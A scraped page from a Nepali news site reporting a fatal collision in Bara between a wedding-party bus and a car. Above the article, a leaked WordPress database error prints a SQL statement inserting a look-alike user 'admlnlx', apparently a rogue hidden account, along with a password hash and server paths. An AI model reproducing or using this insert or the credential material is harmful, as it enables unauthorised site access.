WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxNslDVnBXwm1ew72ondTM2M8Vanjq.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:43:27', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बारामा जन्ती बोकेको बस र कार ठोक्किँदा चार जनाको मृत्यु – Gaule Khabar

बारामा जन्ती बोकेको बस र कार ठोक्किँदा चार जनाको मृत्यु

बारामा जन्ती बोकेको बस र कार ठोक्किँदा चार जनाको मृत्यु

बारा, मंसिर २५ –

बाराको आधाभारमा बस र कार आपसमा ठोक्किँदा भएको दुर्घटनामा चार जनाको मृत्यु भएको छ ।

हेटौंडातर्फ जन्ती लिएर गएको ना ६ ख ६७५४ नम्बरको बस र पथलैयातर्फ आउँदै गरेको बा १२ च ८२९० नम्बरको कार आपसमा ठोक्किँदा दुर्घटना भएको हो ।

दुर्घटनामा परी मृत्यु हुनेहरुमा कार चालक खोटाङ–८ रामधनीका दिपक थापा, सोही स्थानका महेन्द्र आले, कुमारी थापा र उनका ११ महिनाका छोरो जेनीस आले रहेको ईलाका प्रहरी कार्यालय सिमराले जनाएको छ ।

दुर्घटनामा बसमा सवार केही जन्ती सामान्य घाइते भएका छन् । अत्याधिक गतिका कारण कार अनियन्त्रित भई बसमा ठोक्किए पछि दुर्घटना भएको हुन सक्ने प्रहरीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका